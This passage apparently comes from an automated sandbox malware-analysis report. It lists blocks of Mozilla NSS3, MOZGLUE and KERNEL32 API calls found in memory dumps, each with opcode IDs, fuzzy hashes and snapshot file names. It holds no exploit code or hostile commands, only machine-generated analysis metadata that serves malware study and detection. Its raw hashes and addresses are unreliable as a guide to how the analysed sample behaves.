                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE69F71,?,?,00000000), ref: 6CE8BF7F
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE8BFA9
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE8C014
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3689625208-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 828d06f6565e73a5eace477973461b6283e7c97e28380a9d49bbe15110654b6e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 344a8de7592c120e748219a955dc9129314d33f3115592ad2e2ff7ceddcdb58e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 828d06f6565e73a5eace477973461b6283e7c97e28380a9d49bbe15110654b6e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D41B275E022059BEB10CE69CC81BBA73B9AF4524CF314128E81DE7B41FB31D905CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE5EDFD
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000), ref: 6CE5EE64
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CE5EECC
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE5EEEB
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE5EEF6
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3833505462-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: cb6cdb89cda972147af5d558ff8cf569069cd7d8ff4671ae47aefc27e0837d03
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ecf735f8fb1f22c328babcd0f9da1f4c2c067b5faea17440dfb33570d9071d9a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb6cdb89cda972147af5d558ff8cf569069cd7d8ff4671ae47aefc27e0837d03
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D931F5B1B10A009BE7209F2CCC457677BB4FB46308FA40529E95A87B50DB37E524CBE2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE71F1C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6CF89EBC), ref: 6CE71FB8
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(6CF89E9C,?,?,6CF89E9C), ref: 6CE7200A
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6CE72020
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE66A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CE6AD50,?,?), ref: 6CE66A98
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE72030
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1390266749-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f419b7efe56abf097a447986661f59d4f0f73c28e589fa69429a5f14d744cd35
                                                                                                                                                                                                                                                                                                                      • Instruction ID: cbb87279f75918cc18e49238a3b20fc88016f738008690e8269810110cc8ec66
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f419b7efe56abf097a447986661f59d4f0f73c28e589fa69429a5f14d744cd35
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21210675941601ABE7214A55DC45FAA7BB8FF5231CF340215E82C96F80E732E528C7B2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CE61E0B
                                                                                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CE61E24
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE61E3B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CE61E8A
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CE61EAD
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1529734605-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 54971b6800a44b099c255ce9db9cb50784888f07d83b570ceecaadc7be4450ad
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2415b33c4a12626e2a38d9841a5453be62ecf4009cbf5505975e90728fa5ba82
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54971b6800a44b099c255ce9db9cb50784888f07d83b570ceecaadc7be4450ad
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0212572E54310ABD7028EA9DC40B8BB3B49B85768F244638ED6957B80E730D90887E3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF71E5C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BF0: TlsGetValue.KERNEL32(?,?,?,6CF70A75), ref: 6CF29C07
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3(00000000), ref: 6CF71E75
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CF71EAB
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CF71ED0
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CF71EE8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CurrentThread$ErrorLockUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 121300776-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: eeb739c8b5d62ddde1a25c01ffa213646c8d7a37a45be8771b1efe9f4808728e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 382b6b60593950876bd0239c8a32f0bc738733061d8efe2f79836434f070bf55
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeb739c8b5d62ddde1a25c01ffa213646c8d7a37a45be8771b1efe9f4808728e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8721AF75B14512ABD720CF19E860E96B7B1FF44718B25C22AE8199BB40D730FD68CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE6E708,00000000,00000000,00000004,00000000), ref: 6CEBBE6A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC08B4
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE704DC,?), ref: 6CEBBE7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEBBEC2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE704DC,?,?), ref: 6CEBBED7
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEBBEEB
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1367977078-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 91f218ccb8fabfd7d62e59fe99795903e54167862c6520235b12c65b5cb4a080
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4411E26AE0420A67E7108DA9AEC1F77B37D9B4175CF644125FE04B6B62E731D80486E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,6CE63FFF,00000000,?,?,?,?,?,6CE61A1C,00000000,00000000), ref: 6CE6ADA7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CE63FFF,00000000,?,?,?,?,?,6CE61A1C,00000000,00000000), ref: 6CE6ADB4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6CE63FFF,?,?,?,?,6CE63FFF,00000000,?,?,?,?,?,6CE61A1C,00000000), ref: 6CE6ADD5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CF894B0,?,?,?,?,?,?,?,?,6CE63FFF,00000000,?), ref: 6CE6ADEC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE63FFF), ref: 6CE6AE3C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 390f77656fb7b892c84100c125a8b7448027b13d88a5b3738287eee00a4a2c18
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 76a227828114b6acbc517da38a4b40178f7630da591643d8ab3afa4bddef5d74
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 390f77656fb7b892c84100c125a8b7448027b13d88a5b3738287eee00a4a2c18
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B113871F502146BE7109BA69C41BBF73B8DF9524DF24462CEC1996B41FB20E95882E3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CE80710), ref: 6CE78FF1
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2158,6CE79150,00000000,?,?,?,6CE79138,?,6CE80710), ref: 6CE79029
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000,?,?,6CE80710), ref: 6CE7904D
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CE80710), ref: 6CE79066
                                                                                                                                                                                                                                                                                                                      • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CE80710), ref: 6CE79078
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1176783091-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f62651f91bfb05836217164d07f84d5529161116041e0d4f46b4bfcd362383c4
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0eba0d6c31ee868c2163b1bbe172d47d21fccfde4282b676cf93855749c85237
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f62651f91bfb05836217164d07f84d5529161116041e0d4f46b4bfcd362383c4
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1311CE61B2011157EB301AA9AC48A6A32B8EF827ACF600121FD84C7B80F797CD56D3B1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1E10: TlsGetValue.KERNEL32 ref: 6CEA1E36
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1E10: EnterCriticalSection.KERNEL32(?,?,?,6CE7B1EE,2404110F,?,?), ref: 6CEA1E4B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1E10: PR_Unlock.NSS3 ref: 6CEA1E76
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6CE8D079,00000000,00000001), ref: 6CE8CDA5
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,6CE8D079,00000000,00000001), ref: 6CE8CDB6
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CE8D079,00000000,00000001), ref: 6CE8CDCF
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6CE8D079,00000000,00000001), ref: 6CE8CDE2
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE8CDE9
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 99ca87fc415ea1c1a94328ef4fcb7566b517ef7b0b2371e11e544040c6569dc6
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a2819b8f45249622e89d3534ef10a4c335a6dcac0d6dc2cf0fd0696811f46f5c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99ca87fc415ea1c1a94328ef4fcb7566b517ef7b0b2371e11e544040c6569dc6
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D211C2B6B02111ABDB00AFA5EC84A97B77CFF0525D7204221EA0DD7E41E732E424C7E1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEF5B56
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF2CEC
